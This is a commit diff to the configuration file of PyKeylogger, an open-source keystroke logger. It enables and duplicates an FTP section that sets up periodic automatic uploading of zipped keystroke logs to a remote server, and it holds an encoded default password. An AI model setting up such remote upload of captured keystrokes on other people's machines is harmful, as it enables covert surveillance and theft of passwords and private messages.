add log ftper, update control panel to use the module-level mainapp reference

--- a/pykeylogger.ini
+++ b/pykeylogger.ini
@@ -149,41 +149,44 @@ Enable Zip = False
 Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
 Zip Interval = 4.0
 
-#~ [FTP]
+[[FTP]]
 
-#~ # default: False
-#~ FTP Enable Tooltip = Set to True to enable automatic periodic uploading of a zipped archive of logfiles by FTP.
-#~ FTP Enable = False
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = FTPLogUploader
 
-#~ # default: your.FTP.server
-#~ FTP Server Tooltip = Set to the hostname of your FTP server.
-#~ FTP Server = your.FTP.server
+# default: False
+Enable FTP Tooltip = Set to True to enable automatic periodic uploading of a zipped archive of logfiles by FTP.
+Enable FTP = False
 
-#~ # default: 21
-#~ FTP Port Tooltip = Set to the port number of your FTP server (most FTP servers run on port 21).
-#~ FTP Port = 21
+# default: your.FTP.server
+FTP Server Tooltip = Set to the hostname of your FTP server.
+FTP Server = your.FTP.server
 
-#~ # default: pykeylogger
-#~ FTP Upload Directory Tooltip = Set to the directory on the server where you would like to upload (relative or full path accepted).
-#~ FTP Upload Directory = pykeylogger
+# default: 21
+FTP Port Tooltip = Set to the port number of your FTP server (most FTP servers run on port 21).
+FTP Port = 21
 
-#~ # default: anonymous
-#~ FTP Username Tooltip = Set to your username on the target FTP server.
-#~ FTP Username = anonymous
+# default: anonymous
+FTP Username Tooltip = Set to your username on the target FTP server.
+FTP Username = anonymous
 
-#~ # For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
-#~ # Setting it here directly will not work.
-#~ # default: anonymous@
-#~ FTP Password Tooltip = Set to your password on the target FTP server.
-#~ FTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# Setting it here directly will not work.
+# default: anonymous@
+FTP Password Tooltip = Set to your password on the target FTP server.
+FTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=
 
-#~ # default: True
-#~ FTP Passive Tooltip = Set to True to enable passive mode file transfer (recommended).
-#~ FTP Passive = True
+# default: pykeylogger
+FTP Upload Directory Tooltip = Set to the directory on the server where you would like to upload (relative or full path accepted).
+FTP Upload Directory = pykeylogger
 
-#~ # default: 4.0
-#~ FTP Interval Tooltip = Set this to the time interval between automatic FTP events, in HOURS.
-#~ FTP Interval = 4.0
+# default: True
+FTP Passive Mode Tooltip = Set to True to enable passive mode file transfer (recommended).
+FTP Passive Mode = True
+
+# default: 4.0
+FTP Interval Tooltip = Set this to the time interval between automatic FTP events, in HOURS.
+FTP Interval = 4.0
 
 [[Old Log Deletion]]
 
@@ -333,6 +336,45 @@ Enable Zip = False
 # default: 4.0
 Zip Interval Tooltip = Set this to the time interval between automatic zip events, in HOURS.
 Zip Interval = 4.0
+
+[[FTP]]
+
+# Name of class to instantiate to create this thread. Internal use only.
+_Thread_Class = FTPLogUploader
+
+# default: False
+Enable FTP Tooltip = Set to True to enable automatic periodic uploading of a zipped archive of logfiles by FTP.
+Enable FTP = False
+
+# default: your.FTP.server
+FTP Server Tooltip = Set to the hostname of your FTP server.
+FTP Server = your.FTP.server
+
+# default: 21
+FTP Port Tooltip = Set to the port number of your FTP server (most FTP servers run on port 21).
+FTP Port = 21
+
+# default: anonymous
+FTP Username Tooltip = Set to your username on the target FTP server.
+FTP Username = anonymous
+
+# For security purposes, this value can only be set through the control panel, to avoid storing your password in plain text.
+# Setting it here directly will not work.
+# default: anonymous@
+FTP Password Tooltip = Set to your password on the target FTP server.
+FTP Password = eJyrzC8tKkgsLi7PL0oBACKaBUM=
+
+# default: pykeylogger
+FTP Upload Directory Tooltip = Set to the directory on the server where you would like to upload (relative or full path accepted).
+FTP Upload Directory = pykeylogger
+
+# default: True
+FTP Passive Mode Tooltip = Set to True to enable passive mode file transfer (recommended).
+FTP Passive Mode = True
+
+# default: 4.0
+FTP Interval Tooltip = Set this to the time interval between automatic FTP events, in HOURS.
+FTP Interval = 4.0
 
 [[Old Log Deletion]]
 
